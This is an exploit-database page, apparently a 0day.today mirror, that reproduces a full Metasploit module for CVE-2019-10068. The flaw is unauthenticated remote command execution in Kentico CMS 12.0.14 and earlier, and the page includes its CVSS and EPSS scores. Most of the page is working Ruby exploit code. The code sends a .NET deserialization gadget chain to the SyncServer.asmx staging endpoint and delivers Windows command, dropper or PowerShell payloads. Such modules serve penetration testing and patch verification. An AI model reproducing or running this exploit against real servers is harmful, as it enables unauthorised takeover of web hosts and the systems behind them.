Lucene search

K
zdtMetasploit1337DAY-ID-34387
HistoryMay 07, 2020 - 12:00 a.m.

Kentico CMS 12.0.14 Remote Command Execution Exploit

2020-05-0700:00:00
metasploit
0day.today
480

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.974 High

EPSS

Percentile

99.9%

This Metasploit module exploits a vulnerability in the Kentico CMS platform versions 12.0.14 and earlier. Remote command execution is possible via unauthenticated XML requests to the Staging Service SyncServer.asmx interface ProcessSynchronizationTaskData method stagingTaskData parameter. XML input is passed to an insecure .NET deserialize call which allows for remote command execution.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Powershell

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Kentico CMS Staging SyncServer Unserialize Remote Command Execution',
      'Description' => %q{
        This module exploits a vulnerability in the Kentico CMS platform versions 12.0.14 and earlier.
        Remote Command Execution is possible via unauthenticated XML requests to the Staging Service
        SyncServer.asmx interface ProcessSynchronizationTaskData method stagingTaskData parameter. XML
        input is passed to an insecure .NET deserialize call which allows for remote command execution.
      },
      'DisclosureDate' => '2019-04-15',
      'Author' =>
        [
          'Manoj Cherukuri',  # Discovery
          'Justin LeMay',     # Discovery
          'aushack',          # msf exploit
        ],
      'References' =>
        [
          ['CVE', '2019-10068'],
          ['URL', 'https://www.aon.com/cyber-solutions/aon_cyber_labs/unauthenticated-remote-code-execution-in-kentico-cms/']
        ],
      'License' => MSF_LICENSE,
      'Platform' => 'win',
      'Payload' => { 'DisableNops' => true },
      'Targets' => [
        [ 'Windows EXE Dropper',
          'Arch'  => [ARCH_X86, ARCH_X64],
          'Type'  => :windows_dropper
        ],
        [ 'Windows Command',
          'Arch'  => ARCH_CMD,
          'Type'  => :windows_command,
          'Space' => 3000
        ],
        [ 'Windows Powershell',
          'Arch'  => [ARCH_X86, ARCH_X64],
          'Type'  => :windows_powershell
        ]
      ]
    ))

    register_options([
      OptString.new('TARGETURI', [ true, 'Path to SyncServer.asmx', '/CMSPages/Staging/SyncServer.asmx']),
      Opt::RPORT(80)
    ])
  end

  def check
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path),
      'method' => 'GET'
    })

    if res && res.body =~ /SyncServer Web Service/i # SOAP endpoint disco / WSDL
      return CheckCode::Detected
    end

    return CheckCode::Safe
  end

  def exploit
    case target['Type']
    when :windows_command
      execute_command(payload.encoded)
    when :windows_dropper
      cmd_target = targets.select {|target| target['Type'] == :windows_command}.first
      execute_cmdstager({linemax: cmd_target.opts['Space']})
    when :windows_powershell
      execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true))
    end
  end

  def execute_command(cmd, opts = {})
    sploit = ::Msf::Util::DotNetDeserialization.generate(
      cmd,
      gadget_chain: :WindowsIdentity,
      formatter: :SoapFormatter
    )

    res = send_request_cgi({
      'uri'       => normalize_uri(target_uri.path, '/ProcessSynchronizationTaskData'),
      'method'    => 'POST',
      'vars_post' => {'stagingTaskData' => sploit}
    })

    unless res && res.body.include?('Unable to cast object of type')
      fail_with(Failure::UnexpectedReply, 'The payload was rejected')
    end
  end
end

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.974 High

EPSS

Percentile

99.9%